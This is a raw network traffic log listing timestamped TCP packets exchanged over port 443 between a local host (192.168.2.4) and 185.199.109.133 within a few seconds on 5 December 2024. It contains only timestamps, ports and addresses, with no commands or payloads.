Dec 5, 2024 19:36:30.198767900 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.198851109 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.198869944 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.198904037 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.208729982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.208750010 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.208805084 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.208823919 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.208857059 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.248862982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.248881102 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.248950958 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.248970985 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.249113083 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.257163048 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.257184982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.257226944 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.257241011 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.257266998 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.257280111 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.267569065 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.267590046 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.267652035 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.267669916 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.267708063 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.356142044 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.356172085 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.356221914 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.356241941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.356266975 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.356277943 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.364023924 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.364043951 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.364110947 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.364129066 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.364166975 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.373265982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.373287916 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.373358011 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.373380899 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.373416901 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.381442070 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.381463051 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.381500959 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.381515980 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.381560087 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.381578922 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.390635014 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.390654087 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.390692949 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.390707016 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.390729904 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.390744925 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.441077948 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.441098928 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.441180944 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.441203117 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.441240072 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.448762894 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.448782921 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.448847055 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.448865891 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.448893070 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.448913097 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.456223011 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.456243992 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.456681967 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.456696033 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.456742048 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.549093008 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.549117088 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.549189091 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.549211025 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.549246073 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.555845022 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.555876970 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.555913925 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.555928946 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.555958986 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.555980921 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.564090967 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.564110994 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.564199924 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.564214945 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.564259052 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.572660923 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.572680950 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.572787046 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.572802067 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.572839975 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.580152988 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.580173016 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.580256939 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.580291986 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.580329895 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.633536100 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.633564949 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.633909941 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.633943081 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.633987904 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.640253067 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.640274048 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.640373945 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.640388966 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.640429974 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.648468018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.648487091 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.648601055 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.648612976 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.648653984 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.741290092 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.741317987 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.741367102 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.741386890 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.741416931 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.741432905 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.747711897 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.747731924 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.747811079 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.747822046 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.747855902 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.756184101 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.756212950 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.756308079 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.756323099 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.756360054 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.764410973 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.764441013 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.764554977 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.764600039 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.764640093 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.772805929 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.772833109 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.772947073 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.772958040 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.773003101 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.825634003 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.825658083 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.825722933 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.825743914 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.825758934 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.825778961 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.832633018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.832659960 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.832743883 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.832768917 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.832818031 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.840949059 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.840974092 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.841039896 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.841049910 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.841128111 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.900577068 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.933518887 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.933548927 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.933612108 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.933634043 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.933651924 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.933672905 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.939771891 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.939790010 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.939866066 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.939893007 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.939929962 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.948185921 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.948203087 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.948276997 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.948299885 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.948340893 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.956470013 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.956492901 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.956557989 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.956578970 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.956602097 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.956621885 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.964936018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.964953899 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.965022087 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:30.965042114 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:30.965080023 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.018434048 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.018450022 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.018506050 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.018528938 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.018577099 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.025767088 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.025782108 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.025856972 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.025875092 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.025912046 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.034208059 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.034224033 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.034312010 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.034332037 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.034370899 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.087531090 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.125294924 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.125315905 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.125386000 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.125410080 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.125448942 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.132961988 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.132982969 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.133038044 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.133054018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.133065939 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.133094072 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.140320063 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.140338898 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.140384912 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.140399933 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.140429974 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.140450954 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.148539066 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.148555040 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.148628950 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.148654938 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.148688078 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.156917095 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.156930923 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.157004118 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.157023907 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.157059908 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.202469110 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.210395098 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.210411072 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.210511923 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.210531950 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.210576057 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.218079090 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.218094110 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.218142986 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.218158007 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.218194962 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.225397110 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.225411892 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.225492001 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.225509882 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.225563049 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.264240026 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.317553997 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.317574024 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.317662001 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.317687988 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.317728043 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.325181961 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.325200081 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.325284958 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.325304031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.325344086 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.332511902 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.332526922 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.332591057 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.332607031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.332655907 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.338047028 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.340929031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.340950012 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.340996027 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.341008902 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.341033936 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.341053963 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.346581936 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.349173069 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.349188089 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.349253893 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.349268913 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.349317074 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.364310026 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.402662992 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.402693033 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.402750015 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.402775049 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.402817011 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.410337925 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.410355091 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.410414934 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.410434961 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.410507917 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.417645931 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.417660952 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.417715073 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.417738914 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.417798042 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.423619032 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.509959936 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.509978056 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.510085106 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.510112047 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.510153055 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.517327070 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.517352104 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.517421007 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.517447948 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.517458916 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.517541885 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.524801016 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.524821043 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.524898052 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.524919033 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.524951935 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.532984972 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.533003092 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.533062935 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.533083916 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.533123016 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.541316986 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.541332960 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.541407108 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.541433096 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.541471004 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.595057011 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.595079899 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.595151901 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.595172882 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.595185995 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.595232964 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.603514910 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.603532076 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.603588104 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.603606939 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.603652000 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.610045910 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.610063076 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.610127926 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.610142946 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.610184908 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.701977015 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.701997995 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.702073097 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.702096939 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.702147007 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.709572077 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.709587097 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.709645033 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.709665060 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.709697962 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.716888905 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.716912985 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.716965914 CET	49733	443	192.168.2.4	185.199.109.133
